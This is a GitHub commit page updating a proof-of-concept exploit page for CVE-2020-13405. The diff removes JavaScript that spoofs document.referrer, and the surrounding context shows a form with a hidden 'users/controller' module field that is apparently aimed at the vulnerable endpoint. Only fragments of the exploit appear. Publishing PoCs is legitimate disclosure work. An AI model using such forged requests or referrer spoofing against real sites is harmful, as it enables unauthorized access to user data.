Skip to content

Commit

Permalink
Updated CVE-2020-13405 PoC
Browse files Browse the repository at this point in the history
  • Loading branch information
rhino-hunter-stanton committed Jul 21, 2020
1 parent de3476a commit 637b30e
Showing 1 changed file with 1 addition and 6 deletions.
7 changes: 1 addition & 6 deletions CVE-2020-13405/CVE-2020-13405.html
Expand Up @@ -16,11 +16,6 @@
return false;
}
}

delete window.document.referrer;
window.document.__defineGetter__('referrer', function () {
return "yoururl.com";
});
</script>
</head>
<h1 style="color:red;">CVE-2020-13405 PoC</h1>
Expand All @@ -36,4 +31,4 @@ <h3 style="color:red;">Rhino Security Labs</h3>
<input type="hidden" id="module" name="module" value="users/controller">
</form>

</html>
</html>

0 comments on commit 637b30e

Please sign in to comment.